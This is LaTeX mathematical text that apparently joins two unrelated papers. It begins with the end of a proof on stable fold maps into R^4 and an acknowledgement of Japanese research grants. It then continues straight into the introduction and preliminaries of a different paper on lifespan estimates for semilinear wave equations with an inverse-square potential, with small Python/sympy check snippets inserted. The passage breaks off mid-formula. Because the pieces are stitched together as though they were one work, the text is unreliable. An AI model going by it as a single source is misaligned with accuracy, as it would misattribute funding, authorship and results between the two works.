By virtue of the arguments (together with some additional properties on topological structures), we have a desired stable fold map on a desired manifold in the case $(l_0,{l_0}^{\prime})=(2,1)$ with $(l_1,l_2,k_1,k_2)=(l,l,k,k)$. For example, we can take $a_1$ and $a_2$ as the duals of natural homology classes and $b_1$ as the dual of a class represented by $S$ before.
By considering a connected sum of the original manifolds instead, we have a desired result in the case $(l_0,{l_0}^{\prime})=(2,2)$ with $(l_1,l_2,k_1,k_2)=(l,l,k,k)$. In this case we define $P^{\prime}:=\{x:=(x_1,x_2,x_3,x_4) \in {\mathbb{R}}^4 \mid x_1 \geq 2.75.\}$ of ${\mathbb{R}}^4$ instead of $P$ to obtain a desired map and a manifold. We can also consider original round fold maps in Proposition \ref{prop:2} or \ref{prop:3} and take $P^{\prime}$ instead as before to obtain a desired map and a manifold. We have a desired stable fold map.
We can easily generalize the proof to the general case. In fact, it is sufficient to consider suitable iterations of the presented fundamental operations (in suitably and naturally generalized ways) for given stable maps into ${\mathbb{R}}^4$.
This completes the proof.
\end{proof}
\section{Acknowledgement.}
\label{sec:3}
\thanks{This work was partially supported by "The Sasakawa Scientific Research Grant" (2020-2002 : https://www.jss.or.jp/ikusei/sasakawa/). The author is a member of JSPS KAKENHI Grant Number JP17H06128 "Innovative research of geometric topology and singularities of differentiable mappings" (Principal Investigator: Osamu Saeki). This work is also supported by the project. We declare that data supporting our present work is all in the present paper.}
In this paper,
we are interested in a class of semilinear wave equations with the inverse-square potential
and small, spherically symmetric initial data, which has the form
\begin{Eq}\label{Eq:U_o}
\begin{cases}
\partial_t^2 U -\Delta U+Vr^{-2}U=|U|^p, \quad r=|x|,~(t,x)\in{\mathbb{R}}_+\times{\mathbb{R}}^n;\\
U(0,x)=\varepsilon U_0(r),\quad U_t(0,x)=\varepsilon U_1(r);
\end{cases}
\end{Eq}
where $p>1$,
$n\geq 2$,
$0<\varepsilon\ll 1$
and $V\geq -(n-2)^2/4$ is a constant.
We will study the long-time existence and global solvability of \eqref{Eq:U_o}.
Specifically,
setting $T_\varepsilon$ to be the lifespan of the solution to \eqref{Eq:U_o},
we want to know its relation with $n$, $V$, $p$ and $\varepsilon$.
When $V=0$,
this problem reduces to the well known \emph{Strauss} conjecture,
which has been extensively studied in a long history.
See, e.g., \cite{MR1481816}, \cite{MR1804518}, \cite{MR3247303}, \cite{MR3169791} and the references therein for more information.
Let $p_S(n)$ be the positive root of $h_S(p;n)=0$,
where
\begin{Eq*}
h_S(p;n):=(n-1)p^2-(n+1)p-2.
\end{Eq*}
From early research,
under some natural requirements on $(U_0,U_1)$,
it is known that
\begin{Eq*}
\kl\{\begin{aligned}
T_\varepsilon\approx &\varepsilon^{\frac{2p(p-1)}{h_S(p)}},&&\max(1,\frac{2}{n-1})<p<p_S;\\
\ln T_\varepsilon\approx& \varepsilon^{-p(p-1)},&&p=p_S;\\
T_\varepsilon=&\infty, && p>p_S.
\end{aligned}\kr.
\end{Eq*}
Here and in what follows,
we denote $x\lesssim y$ and $y\gtrsim x$ if $x\leq Cy$ for some $C>0$,
independent of $\varepsilon$,
which may change from line to line.
We also denote $x\approx y$ if $x\lesssim y\lesssim x$.
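For concreteness, $p_S(n)$ is given explicitly by the quadratic formula applied to $h_S$; the following short Python sketch (our own illustration, not part of the argument) evaluates it and recovers the classical values $p_S(3)=1+\sqrt{2}$ and $p_S(4)=2$.

```python
import math

def h_S(p, n):
    # h_S(p; n) = (n-1)p^2 - (n+1)p - 2
    return (n - 1)*p**2 - (n + 1)*p - 2

def p_S(n):
    # positive root of h_S(p; n) = 0
    return ((n + 1) + math.sqrt((n + 1)**2 + 8*(n - 1))) / (2*(n - 1))

assert abs(h_S(p_S(3), 3)) < 1e-12
assert abs(p_S(3) - (1 + math.sqrt(2))) < 1e-12   # Strauss exponent in n = 3
assert abs(p_S(4) - 2) < 1e-12
```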
When there exists a potential, i.e.,
$V\neq 0$,
the problem becomes much more complicated.
This is partly because that the inverse-square potential is in the same scaling as the wave operator,
which means that it provides a comparable effect to the evolution of the solution.
Meanwhile, the extra singularity at the origin also needs to be taken care of.
The elliptic operator $-\Delta+V|x|^{-2}$ has been studied in several different equations related to physics and geometry,
such as in heat equations (see, e.g., \cite{MR1760280}), in quantum mechanics (see, e.g., \cite{MR0397192}), in Schr\"odinger equations and wave equations.
Among others, the \emph{Strichartz} estimates for wave equations with the inverse square potential have been well-developed in many works.
Such a result was first established in \cite{MR1952384} for wave equations with radial data.
Shortly afterwards, the radial requirement was removed by \cite{MR2003358}.
A decade later, the \emph{Strichartz} estimates with angular regularity were developed in \cite{MR3139408}.
Despite these results, we expect that these kinds of estimates still have room for improvement and generalization.
Let us turn back to the equation \eqref{Eq:U_o}.
Note that the initial data of \eqref{Eq:U_o} are spherically symmetric,
which suggests that the solution $U$ is also spherically symmetric.
Let $$A:=2+\sqrt{(n-2)^2+4V},~u(t,r):=r^{\frac{n-A}{2}}U(t,x).$$
A formal calculation shows that $u$ satisfies the equation
\begin{Eq}\label{Eq:u_o}
\begin{cases}
\partial_t^2 u -\Delta_Au=r^{\frac{(A-n)p+n-A}{2}}|u|^p,\quad (t,r)\in {\mathbb{R}}_+^2,\\
u(0,x)=\varepsilon r^{\frac{n-A}{2}}U_0(r),\quad u_t(0,x)=\varepsilon r^{\frac{n-A}{2}}U_1(r),
\end{cases}
\end{Eq}
where $\Delta_A:=\partial_r^2+(A-1)r^{-1}\partial_r$.
When $A\in {\mathbb{Z}}_+$, the operator $\Delta_A$ agrees with the $A$-dimensional Laplace operator (for radial functions),
from which we consider the parameter $A$ as the spatial ``dimension" for the equation after the transformation.
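The computation leading to \eqref{Eq:u_o} can be verified symbolically. The following sympy sketch (our own check) uses the equivalent relation $V=(A-n)(A+n-4)/4$, which follows from $A=2+\sqrt{(n-2)^2+4V}$, and confirms that the potential term is absorbed into $\Delta_A$; the weight $r^{\frac{(A-n)p+n-A}{2}}$ in the nonlinearity then comes from $|U|^p=r^{\frac{p(A-n)}{2}}|u|^p$.

```python
import sympy as sp

t, r, n, A = sp.symbols('t r n A', positive=True)
V = (A - n)*(A + n - 4)/4        # equivalent to A = 2 + sqrt((n-2)^2 + 4V)

u = sp.Function('u')(t, r)
U = r**((A - n)/2)*u             # inverse of the substitution u = r^{(n-A)/2} U

# radial wave operator with the inverse-square potential, applied to U
wave_U = sp.diff(U, t, 2) - (sp.diff(U, r, 2) + (n - 1)/r*sp.diff(U, r)) + V/r**2*U

# claim: this equals r^{(A-n)/2} (u_tt - Delta_A u), Delta_A = d_r^2 + (A-1) r^{-1} d_r
wave_u = sp.diff(u, t, 2) - (sp.diff(u, r, 2) + (A - 1)/r*sp.diff(u, r))

assert sp.simplify(wave_U - r**((A - n)/2)*wave_u) == 0
```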
The blow-up result of \eqref{Eq:U_o} has been systematically considered in the previous paper \cite{MR4130094} by the first author and his collaborators.
Here we define
\begin{Eq*}
h_F(p;n):=np-(n+2)
\end{Eq*}
with $p_F(n)$ be the root of $h_F(p;n)=0$, and use abbreviations
\begin{Eq*}
&p_d=p_d(A):=\frac{2}{A-1},\quad p_F=p_F((n+A-2)/2),\quad p_S=p_S(n),\\
&h_S=h_S(p;n),\quad h_F=h_F(p;(n+A-2)/2),
\end{Eq*}
if these do not lead to ambiguity.
Then, under some requirements on the initial data, there exists a constant $C=C(p;n,A)$
such that when $(3-A)(A+n+2)<8$, where $p_d<p_F<p_S$, we have
\begin{Eq*}
T_\varepsilon\leq
\begin{cases}
C \varepsilon^{\frac{p-1}{h_F}},&p\leq p_d;\\
C\varepsilon^{\frac{2p(p-1)}{h_S}},&p_d<p<p_S;\\
\exp\kl(C \varepsilon^{-p(p-1)}\kr),&p=p_S.
\end{cases}
\end{Eq*}
When $(3-A)(A+n+2)=8$, where $p_d=p_F=p_S$, we have
\begin{Eq*}
T_\varepsilon\leq
\begin{cases}
C \varepsilon^{\frac{p-1}{h_F}},&p<p_F;\\
\exp\kl(C \varepsilon^{-(p-1)}\kr),&p=p_F.
\end{cases}
\end{Eq*}
When $(3-A)(A+n+2)>8$, where $p_d>p_F>p_S$, we have
\begin{Eq*}
T_\varepsilon\leq
\begin{cases}
C \varepsilon^{\frac{p-1}{h_F}},&p<p_F;\\
\exp\kl(C \varepsilon^{-(p-1)}\kr),&p=p_F.
\end{cases}
\end{Eq*}
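As a concrete illustration of the borderline case (a numerical check of our own), the pair $(n,A)=(4,2)$ satisfies $(3-A)(A+n+2)=8$, and there all three exponents coincide: $p_d=p_F=p_S=2$.

```python
import math

n, A = 4, 2
assert (3 - A)*(A + n + 2) == 8                # the borderline case

p_d = 2/(A - 1)
p_F = (n + A + 2)/(n + A - 2)                  # p_F((n+A-2)/2) = (n+A+2)/(n+A-2)
p_S = ((n + 1) + math.sqrt((n + 1)**2 + 8*(n - 1)))/(2*(n - 1))

assert p_d == 2 and p_F == 2 and abs(p_S - 2) < 1e-12
```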
This result suggests that two effects will impact the lifespan.
For simplicity we call one the \emph{Strauss} effect
and the other the \emph{Fujita} effect, since $p_S$ is the \emph{Strauss} exponent and $p_F$ is the \emph{Fujita} exponent. On the other hand, we remark that $p_F((n+A-2)/2)=p_G((n+A)/2)$, where $p_G(n)=\frac{n+1}{n-1}$ is the \emph{Glassey} exponent.
The \emph{Glassey} exponent appears in the wave equations with derivative nonlinearity $|\partial_t u|^p$, which suggests that there may exist some relation between the \emph{Glassey} conjecture (see, e.g., \cite{W15}) and our problem.
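The identity $p_F((n+A-2)/2)=p_G((n+A)/2)$ is a direct computation, as both sides equal $\frac{n+A+2}{n+A-2}$; here is a short symbolic check of our own.

```python
import sympy as sp

n, A = sp.symbols('n A', positive=True)

p_F = lambda m: (m + 2)/m           # positive root of h_F(p; m) = m*p - (m + 2)
p_G = lambda m: (m + 1)/(m - 1)     # Glassey exponent

assert sp.simplify(p_F((n + A - 2)/2) - p_G((n + A)/2)) == 0
```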
For the existence part, there are also a few studies of \eqref{Eq:U_o}.
Using \emph{Strichartz} estimates, the global existence result was shown in \cite{MR1952384, MR2003358} if
\begin{Eq*}
p\geq \frac{n+3}{n-1},\quad \frac{A-2}{2}>\frac{n-2}{2}-\frac{2}{p-1}+\max\kl\{\frac{1}{2p},\frac{1}{(n+1)(p-1)}\kr\}.
\end{Eq*}
Later, the result was further extended in \cite{MR3139408}, where the global result in the radial case was obtained for $1+\frac{4n}{(n+1)(n-1)}<p<\frac{n+3}{n-1}$,
\begin{Eq*}
&V>\max\kl\{\frac{1}{(n-1)^2}-\frac{(n-2)^2}{4},\frac{n}{q_0}\kl(\frac{n}{q_0}-n+2\kr),\kl(\frac{n}{r_0}-n\kr)\kl(\frac{n}{r_0}-2\kr)\kr\},\\
&q_0=\frac{(p-1)(n+1)}{2},\qquad r_0=\frac{(n+1)(p-1)}{2p}.
\end{Eq*}
However,
compared with the result of the problem without potential, in general,
it seems that the sharp result for \eqref{Eq:U_o}
cannot be obtained by the \emph{Strichartz} estimates without weight.
On the other hand, there is also a gap between these results and the blow-up result we mentioned before.
Now,
we are in a position to state our main results in this paper.
Firstly, we give the definition of the solution,
and see \Se{Se:2} for further discussions.
\begin{definition}\label{De:U_w}
We call $U$ a weak solution of \eqref{Eq:U_o} in $[0,T]\times {\mathbb{R}}^n$
if $U$ satisfies
\begin{Eq}\label{Eq:U_i}
\int_0^T\int_{{\mathbb{R}}^n} |U|^p\Phi \d x\d t
=&\int_0^T\int_{{\mathbb{R}}^n} U \kl(\partial_t^2-\Delta+\frac{V}{r^2}\kr)\Phi \d x\d t\\
&-\varepsilon\int_{{\mathbb{R}}^n} (U_1\Phi(0,x)-U_0\partial_t\Phi(0,x))\d x,
\end{Eq}
for any $\Phi(t,x)\in \kl\{r^{\frac{A-n}{2}}\phi(t,x):\phi\in C_0^\infty((-\infty,T)\times {\mathbb{R}}^n)\kr\}$.
\end{definition}
For convenience we introduce the notations
\begin{Eq*}
p_m:=\frac{n+1}{n-1},\qquad
p_M:=\begin{cases}\frac{n+1}{n-A}&n>A\\\infty&n\leq A\end{cases},\qquad
p_t:=\frac{n+A}{n-1},\qquad
p_{conf}:=\frac{n+3}{n-1}.
\end{Eq*}
Then, we give the existence results for $A\in[2,3]$.
\begin{theorem}\label{Th:M_1}
Set $2\leq n$,
$2\leq A\leq 3$ and $p_m<p<p_M$.
Assume that the initial data satisfy
\begin{Eq}\label{Eq:ir_1}
\|r^\frac{n-A+2}{2}U_0'(r)\|_{L_r^\infty}+\|r^\frac{n-A}{2}U_0(r)\|_{L_r^\infty}+\|r^\frac{n-A+2}{2}U_1(r)\|_{L_r^\infty}<\infty,
\end{Eq}
and are supported in $[0,1)$, where $L_r^p$ stands for $L^p((0,\infty),\d r)$.
Then, there exists an $\varepsilon_0>0$ and a constant $c=c(p;n,A)$,
such that for any $0<\varepsilon<\varepsilon_0$, there is a weak solution $U$ of \eqref{Eq:U_o} in $[0,T_*)\times {\mathbb{R}}^n$ which satisfies
\begin{Eq*}
r^{\frac{n-A}{2}}U\in L_{loc;t,x}^\infty ([0,T_*)\times {\mathbb{R}}^n).
\end{Eq*}
Here, when $(3-A)(A+n+2)<8$, where $p_d<p_F<p_S$, we have
\begin{Eq}\label{Eq:Main_7}
T_*=\begin{cases}
c\varepsilon^\frac{p-1}{h_F},&p<p_d;\\
c\varepsilon^\frac{p-1}{h_F} |\ln\varepsilon|^{\frac{1}{h_F}},&p=p_d;\\
c\varepsilon^\frac{2p(p-1)}{h_S},&p_d<p<p_S;\\
\exp\kl(c\varepsilon^{p(1-p)}\kr),&p=p_S;\\
\infty,&p>p_S.
\end{cases}
\end{Eq}
When $(3-A)(A+n+2)=8$, where $p_d=p_F=p_S$, we have
\begin{Eq}\label{Eq:Main_8}
T_*=\begin{cases}
c\varepsilon^\frac{p-1}{h_F},&p<p_d;\\
\exp\kl(c\varepsilon^{\frac{1-p}{2}}\kr),&p=p_d;\\
\infty,&p>p_d.
\end{cases}
\end{Eq}
When $(3-A)(A+n+2)>8$, where $p_d>p_F>p_S$, we have
\begin{Eq}\label{Eq:Main_9}
T_*=\begin{cases}
c\varepsilon^\frac{p-1}{h_F},&p<p_F;\\
\exp\kl(c\varepsilon^{1-p}\kr),&p=p_F;\\
\infty,&p>p_F.
\end{cases}
\end{Eq}
\end{theorem}
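As a sanity check on \eqref{Eq:Main_7} (our own numerical illustration): for $p_d<p<p_S$ one has $h_S<0$, so the exponent $\frac{2p(p-1)}{h_S}$ is negative and $T_*\to\infty$ as $\varepsilon\to 0$.

```python
def h_S(p, n):
    return (n - 1)*p**2 - (n + 1)*p - 2

n = 4                                    # here p_S(4) = 2
for p in (1.5, 1.8, 1.99):               # sample subcritical exponents p < p_S
    assert h_S(p, n) < 0
    exponent = 2*p*(p - 1)/h_S(p, n)
    assert exponent < 0                  # T_* = c * eps**exponent -> infinity as eps -> 0
```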
Next, we give the existence results for $A\in[3,\infty)$.
\begin{theorem}\label{Th:M_2}
Set $2\leq n$, $A\geq 3$, $1<p<p_{conf}$,
and define $T_*$ by
\begin{Eq}\label{Eq:Main_6}
T_*=\begin{cases}
c\varepsilon^\frac{2p(p-1)}{h_S},&1<p<p_S;\\
\exp\kl(c\varepsilon^{p(1-p)}\kr),&p=p_S;\\
\infty,&p>p_S,
\end{cases}
\end{Eq}
which is the same as \eqref{Eq:Main_7} since $p_d\leq 1$ when $A\geq3$.
Assume that $1<p\leq p_m$ and
the initial data $(U_0,U_1)$ satisfy
\begin{Eq}\label{Eq:ir_21}
\|r^\frac{n-1}{2}U_0(r)\|_{L_r^p}+\|r^\frac{n+1}{2}U_1(r)\|_{L_r^p}<\infty,
\end{Eq}
and are supported in $[0,1)$.
Then there exists an $\varepsilon_0>0$ and a constant $c$,
such that for any $\varepsilon<\varepsilon_0$,
\eqref{Eq:U_o} has a weak solution in $[0,T_*]\times {\mathbb{R}}^n$ verifying
\begin{Eq*}
\|(1+t)^{\frac{(n-1)p-n-1}{2p}}r^{\frac{n+1}{2p}}U\|_{L_t^\infty L_r^p ([0,T_*]\times {\mathbb{R}}_+)}<\infty,
\end{Eq*}
with $T_*$ defined in \eqref{Eq:Main_6}.
Assume that $p_m\leq p< p_S$, the initial data satisfy \eqref{Eq:ir_21} and
\begin{Eq}\label{Eq:ir_22}
\|r^{\frac{n-1}{2}+\frac{1}{p}}U_0(r)\|_{L_r^\infty}+\|r^{\frac{n+1}{2}+\frac{1}{p}}U_1(r)\|_{L_r^\infty}<\infty,
\end{Eq}
with no compact support requirement.
Then there exists an $\varepsilon_0>0$ and a constant $c$,
such that for any $\varepsilon<\varepsilon_0$,
\eqref{Eq:U_o} has a weak solution in $[0,T_*]\times {\mathbb{R}}^n$ verifying
\begin{Eq*}
\|t^{\frac{(n-1)p-n-1}{2p}}r^{\frac{n+1}{2p}}U\|_{L_t^\infty L_r^p ([0,T_*]\times {\mathbb{R}}_+)}<\infty,
\end{Eq*}
with $T_*$ defined in \eqref{Eq:Main_6}.
Assume that $p=p_S$,
and the initial data satisfy \eqref{Eq:ir_21} and \eqref{Eq:ir_22} for $p=p_S$ as well as some $p>p_S$.
Then there exists an $\varepsilon_0>0$ and a constant $c$,
such that for any $\varepsilon<\varepsilon_0$,
\eqref{Eq:U_o} has a weak solution in $[0,T_*]\times {\mathbb{R}}^n$ verifying
\begin{Eq*}
\|r^{\frac{n+1}{2p_S}}U\|_{L_t^{p_S^2}L_r^{p_S}([0,1]\times {\mathbb{R}}_+)}+
\|t^{\frac{1}{p_S^2}}r^{\frac{n+1}{2p_S}}U\|_{L_t^\infty L_r^{p_S} ([1,T_*]\times {\mathbb{R}}_+)}<\infty,
\end{Eq*}
with $T_*$ defined in \eqref{Eq:Main_6}.
Assume that $p>p_S$ and the initial data satisfy
\begin{Eq*}
\|r^\frac{n-1}{2}U_0(r)\|_{L_r^q}+\|r^\frac{n+1}{2}U_1(r)\|_{L_r^q}<\infty,\qquad q:=\frac{2(p-1)}{(n+3)-(n-1)p}.
\end{Eq*}
Then there exists an $\varepsilon_0>0$,
such that for any $\varepsilon<\varepsilon_0$,
\eqref{Eq:U_o} has a weak solution in ${\mathbb{R}}_+\times {\mathbb{R}}^n$ verifying
\begin{Eq*}
\|r^{\frac{n+1}{2p}}U\|_{L_t^{pq} L_r^p({\mathbb{R}}_+\times {\mathbb{R}}_+)}+\|r^{\frac{n-1}{2}}U\|_{L_t^{\infty} L_r^q({\mathbb{R}}_+\times {\mathbb{R}}_+)}<\infty.
\end{Eq*}
\end{theorem}
\begin{remark}
Here we use a graph with $n\in[4,8]$ as an example
to illustrate the results we obtained.
\begin{figure}[H]
\centering
\includegraphics[width=0.99\textwidth]{n=7.png}
\end{figure}
The white area stands for the region in which the solution is global,
the light gray area ($p>p_d$) stands for the region in which the \emph{Strauss} effect plays a role,
the dark gray area ($p<p_d$) stands for the region in which the \emph{Fujita} effect plays a role,
and the chessboard area stands for the region that we cannot handle due to technical difficulties.
When $n\in[2,3]$,
we find $\frac{3n-1}{n+1}\leq 2$,
which means that the dark gray area does not exist for $p\geq p_m=\frac{n+1}{n-1}$.
When $n=2$, we have $p_M=\infty$ for all $A\geq 2$,
which means that the lower right chessboard area does not exist.
When $n\in[9,\infty)$, we find $1+\frac{4}{n}>\frac{n+1}{n-2}$,
which means that the dark gray area is slightly blocked by the lower right chessboard area.
We illustrate these situations in the figures below.
\begin{figure}[H]
\centering
\includegraphics[width=0.99\textwidth]{n=2,3,10.png}
\end{figure}
\end{remark}
\begin{remark}
The nonlinear term $|U|^p$ in \eqref{Eq:U_o} can be replaced by any $F_p(U)$ which satisfies
\begin{Eq*}
|F_p(U)|\lesssim |U|^p,\qquad |F_p(U_1)-F_p(U_2)|\lesssim |U_1-U_2|\max(|U_1|,|U_2|)^{p-1},
\end{Eq*}
and typical examples include $F_p(U)=\pm|U|^p$ and $F_p(U)=\pm|U|^{p-1}U$.
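Indeed, for $F_p(U)=\pm|U|^{p-1}U$ the second bound follows from the fundamental theorem of calculus:
\begin{Eq*}
|F_p(U_1)-F_p(U_2)|=|U_1-U_2|\int_0^1 p\kl|U_2+s(U_1-U_2)\kr|^{p-1}\d s\leq p|U_1-U_2|\max(|U_1|,|U_2|)^{p-1},
\end{Eq*}
since $U_2+s(U_1-U_2)$ lies on the segment between $U_2$ and $U_1$.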
The only difference is that the constants in the results and proofs need to be adjusted accordingly.
\end{remark}
In lower dimensions, the weighted $L^\infty$ norm estimate,
which first appeared in \cite{MR535704},
is very useful for proving long-time existence results.
In \cite{MR2025737}, the authors showed long-time existence results for a two-dimensional wave system,
using the trick of taking different weights in different zones.
In this paper, we further develop this method, adapting it to wave equations with potential,
and finally show the long-time existence result for $A\in[2,3]$.
On the one hand,
our result is sharp in general, in the sense that
our lower bound on the lifespan has the same order as the upper bound appearing in the blow-up results, except for the borderline case $p=p_d$.
On the other hand, we notice that $A=2$, which means $V=-(n-2)^2/4$, is an extreme case for the operator $-\Delta+Vr^{-2}$.
In this case, the operator is still non-negative but no longer positive, which
makes the implementation of the classical energy method more difficult.
However, our approach handles this extreme case as well as the usual case $V>-(n-2)^2/4$ without any additional difficulty.
In higher dimensions ($n\geq 3$),
it is well known that weighted \emph{Strichartz} estimates
are a helpful tool for the Strauss conjecture, particularly in the high-dimensional case (see, e.g., \cite{MR1408499},
\cite{MR1481816} and \cite{MR1804518}).
In this paper, we adapt the approach of \cite{MR1408499} to the `fractional dimension' $A\geq 3$,
and give the long-time existence result for $A\in[3,\infty)$, which yields the sharp lower bound of the lifespan.
After comparing all the known results, we find that
the exact lifespan can be viewed as the outcome of a competition between
the \emph{Strauss} effect and the \emph{Fujita} effect.
When $p>p_d$, the \emph{Strauss} effect is stronger,
and the final result is determined only by the \emph{Strauss} exponent.
When $p<p_d$, the \emph{Fujita} effect is stronger,
and the final result is determined only by the \emph{Fujita} exponent.
Compared with the results for the problem without potential,
it seems that the requirement $p>p_m$ in \Th{Th:M_1} is only a technical restriction.
Also, compared with the result for the $2$-dimensional \emph{Strauss} conjecture with $p=2$ (though $2\leq p_m(2)=3$),
we expect that both the lower bound and the upper bound of the lifespan for $p=p_d$ can be further improved.
On the other hand, it will be interesting to investigate
the problem with non-radial data, as well as the problem with more general potential functions.
It is known that when $n=3, 4$ and the potential function is of short range, long-time existence results (including the non-radial case) similar to those in
\Th{Th:M_2} are available in \cite{MW17}.
When the potential function has asymptotic behavior $Vr^{-2}$ with $V>0$, the subcritical blow-up result ($p<\max(p_S, p_F)$) was recently obtained in \cite{lai2021lifespan}.
The existence theory for the corresponding problem remains largely open.
Another interesting problem is whether or not the Cauchy problem \eqref{Eq:U_o} admits global solutions for initial data with lowest possible regularity.
For example, when $V=0$ and $2\leq n\leq 4$, such a result is available for $p\in(p_S,p_{conf}]$
with small, spherically symmetric data in the scale-invariant $(\dot H^{s_c}\times \dot H^{s_c-1})$ space ($s_c=n/2-2/(p-1)$).
See \cite{MR2455195,MR2333654,MR2769870} for more discussion.
Here we should remark that the global result in \Th{Th:M_2} reaches the lowest regularity requirement (in the sense of scale invariance, though not in $\dot H^s$ space), but \Th{Th:M_1} still has room for improvement.
The rest of the paper is organized as follows. In \Se{Se:2} we give a detailed discussion of \eqref{Eq:u_o} and its solution.
In \Se{Se:3}, we restrict $A\in[2,3]$ and show the long-time existence of the solution by weighted $L^\infty$ norm estimate.
In \Se{Se:4}, we move to situation $A\in[3,\infty)$ and establish the long-time existence result through weighted \emph{Strichartz} type estimate.
\section{Some preparations}\label{Se:2}
In this section,
we transform \eqref{Eq:U_o} into the equivalent equation \eqref{Eq:u_o},
and justify \De{De:U_w}.
After that, we give the formula for the solution and analyze its properties.
\subsection{The definition of weak solution}
As mentioned before, after introducing $u(t,r):=r^{\frac{n-A}{2}}U(t,x)$,
a formal calculation shows that $u$ satisfies the equation \eqref{Eq:u_o}.
We pause here and consider the corresponding linear equation
\begin{Eq}\label{Eq:u_l}
\begin{cases}
\partial_t^2 u -\Delta_Au=F(t,r),\quad r\in {\mathbb{R}}_+\\
u(0,r)=f(r),\quad u_t(0,r)=g(r),
\end{cases}
\end{Eq}
with $f$, $g$, $F$ sufficiently regular.
When $A\in {\mathbb{Z}}_+$,
equation \eqref{Eq:u_l} can be considered as an $A$-dimensional spherically symmetric wave equation,
where $u(t,r)$ is a classical solution in $[0,T]$
if $u(t,r)$ satisfies \eqref{Eq:u_l} and $u(t,|x|)\in C^2([0,T]\times {\mathbb{R}}^A)$.
Thus,
in the general situation,
we say $u$ is a classical solution of \eqref{Eq:u_l} in $[0,T]$
if $u\in C^2([0,T]\times {\mathbb{R}}_+)$, $\partial_ru(t,0)=0$ and $u$ satisfies \eqref{Eq:u_l} pointwise.
Here we give a quick proof that such a classical solution is unique.
When $f,g,F=0$, multiplying both sides of \eqref{Eq:u_l} by $r^{A-1}u_t$ and integrating over $\Omega:=\{(t,r):0<t<T, 0<r<R+T-t\}$, we see
\begin{Eq*}
0=\frac{1}{2}\kl.\int_0^Rr^{A-1}\kl(u_t^2+u_r^2\kr)\d r\kr|_{t=T}+\frac{1}{2\sqrt{2}}\int\limits_{t+r=T+R\atop 0<t<T}r^{A-1}(u_t-u_r)^2\d \sigma_{t,r}.
\end{Eq*}
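Here we used the pointwise divergence identity
\begin{Eq*}
r^{A-1}u_t\kl(\partial_t^2-\Delta_A\kr)u=\partial_t\kl(\frac{1}{2}r^{A-1}\kl(u_t^2+u_r^2\kr)\kr)-\partial_r\kl(r^{A-1}u_tu_r\kr),
\end{Eq*}
together with the divergence theorem on $\Omega$; the flux through the slanted boundary $\{t+r=T+R\}$, whose unit normal is $(1,1)/\sqrt{2}$, produces the factor $\frac{1}{2\sqrt{2}}$.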
This gives the uniqueness.
After this discussion of the classical solution,
we naturally say $u$ is a weak solution of \eqref{Eq:u_l} if $u$ satisfies
\begin{Eq}\label{Eq:u_i}
\int_0^T\int_0^\infty F\phi r^{A-1}\d r\d t
=&\int_0^T\int_0^\infty u \kl(\partial_t^2-\Delta_A\kr)\phi r^{A-1}\d r\d t\\
&-\int_0^\infty (g\phi(0,r)-f\partial_t\phi(0,r))r^{A-1}\d r,
\end{Eq}
for any $\phi(t,r)\in C_0^\infty\kl((-\infty,T)\times {\mathbb{R}}\kr)$
with $\partial_r^{1+2k} \phi(t,0)=0$ for any $k\in {\mathbb{N}}_0$.
Also, setting $u=r^{\frac{n-A}{2}}U$, $\phi=r^\frac{n-A}{2}\Phi$,
$f=\varepsilon r^{\frac{n-A}{2}} U_0$, $g=\varepsilon r^{\frac{n-A}{2}} U_1$
and $F=r^{\frac{(A-n)p+n-A}{2}}|u|^p$,
it is clear that $u$ satisfying \eqref{Eq:u_i} is equivalent to
$U$ satisfying \eqref{Eq:U_i} with
$\Phi(t,x)\in \kl\{r^{\frac{A-n}{2}}\phi(t,x):\phi\in C_0^\infty((-\infty,T)\times {\mathbb{R}}^n)\kr\}$.
This is why we adopt \De{De:U_w} as the definition of a weak solution of \eqref{Eq:U_o}.
\subsection{The formula for the classical solution}
In this subsection we give the formula for the solution to \eqref{Eq:u_l}.
We denote by $u_g$, $u_f$ and $u_F$ the solutions of \eqref{Eq:u_l} with only $g\neq 0$, $f\neq 0$ and $F\neq 0$, respectively.
\begin{lemma}\label{Le:u_e}
Assume that $f,g, F$ are smooth enough. Then, the classical solution of \eqref{Eq:u_l} is $u=u_f+u_g+u_F$ with
\begin{Eq*}
u_g=&r^{\frac{1-A}{2}} \int_{0}^{t+r}\rho ^{\frac{A-1}{2}}g(\rho) I_A(\mu) \d \rho,\quad
\mu=\frac{r^2+\rho^2-t^2}{2r\rho},\\
u_f=&r^{\frac{1-A}{2}} \partial_t\int_{0}^{t+r}\rho ^{\frac{A-1}{2}}f(\rho) I_A(\mu) \d \rho,\quad
\mu=\frac{r^2+\rho^2-t^2}{2r\rho},\\
u_F=&r^{\frac{1-A}{2}} \int_0^t\int_{0}^{t-s+r}\rho ^{\frac{A-1}{2}}F(s,\rho) I_A(\mu) \d \rho\d s,\quad
\mu=\frac{r^2+\rho^2-(t-s)^2}{2r\rho},\\
I_A(\mu):=&\frac{2^{\frac{1-A}{2}}}{\Gamma\kl(\frac{A-1}{2}\kr)} \int_{-1}^{1} \mathcal{X}_+^{\frac{1-A}{2}}\kl(\lambda-\mu\kr)\sqrt{1-\lambda^2}^{A-3}\d \lambda.
\end{Eq*}
\end{lemma}
\begin{remark}
Here $\mathcal{X}_+^\alpha$ is a distribution, which has the expression
\begin{Eq*}
\mathcal{X}_+^\alpha(x)=\begin{cases}
0,&x<0,~\alpha>-1,\\
\frac{x^\alpha}{\Gamma(\alpha+1)},& x>0,~\alpha>-1,\\
\frac{\d~}{\d x}\mathcal{X}_+^{\alpha+1}(x), &\alpha\leq -1,\\
\end{cases}
\end{Eq*}
with $\Gamma$ the Gamma function and $\frac{\d~}{\d x}$ the weak derivative.
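Typical instances are
\begin{Eq*}
\mathcal{X}_+^{0}(x)=H(x),\qquad \mathcal{X}_+^{-k}(x)=\delta^{(k-1)}(x),\quad k\in {\mathbb{Z}}_+,
\end{Eq*}
with $H$ the Heaviside function; the latter is the case that occurs for odd $A$.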
\end{remark}
\begin{remark}
Consider $\mu=\frac{r^2+\rho^2-t^2}{2r\rho}$. When $r> t$, we have
\begin{Eq*}
\mu|_{0<\rho<r-t}~>~\mu|_{\rho=r-t}=1~>~\mu|_{r-t<\rho<t+r}(>0)~<~\mu|_{\rho=t+r}=1~<~\mu|_{t+r<\rho},
\end{Eq*}
and when $r< t$, we have
\begin{Eq*}
\mu|_{0<\rho<t-r}~<~\mu|_{\rho=t-r}=-1~<~\mu|_{t-r<\rho<t+r}~<~\mu|_{\rho=t+r}=1~<~\mu|_{t+r<\rho}.
\end{Eq*}
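These orderings, as well as many of the estimates below, follow from the elementary factorizations
\begin{Eq*}
1+\mu=\frac{(t+r+\rho)(r+\rho-t)}{2r\rho},\qquad
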